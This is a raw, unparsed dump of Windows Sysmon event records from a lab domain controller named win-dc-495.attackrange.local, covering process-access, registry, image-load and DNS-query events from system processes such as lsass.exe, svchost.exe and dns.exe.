 
13241300x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.220{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-495.attackrange.local 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.220{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.188{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 
10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.829{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x0000037a) 22542200x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.407{59A5CD1D-8E56-6005-2E00-00000000A301}24643.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.407{59A5CD1D-8E56-6005-2E00-00000000A301}24642.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.114{59A5CD1D-8E6E-6005-7F00-00000000A301}4292localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.854{59A5CD1D-8E46-6005-1600-00000000A301}1544isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.818{59A5CD1D-8E46-6005-1600-00000000A301}1544win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.817{59A5CD1D-8E46-6005-1400-00000000A301}1304eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.817{59A5CD1D-8E46-6005-1400-00000000A301}1304fcfikdgfbjwi1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.805{59A5CD1D-8E46-6005-1100-00000000A301}1172wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.756{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.755{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.698{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.693{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-1600-00000000A301}1544localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\svchost.exe 22542200x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.608{59A5CD1D-8E46-6005-1600-00000000A301}1544win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 
22542200x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.606{59A5CD1D-8E44-6005-0B00-00000000A301}856_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.751{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 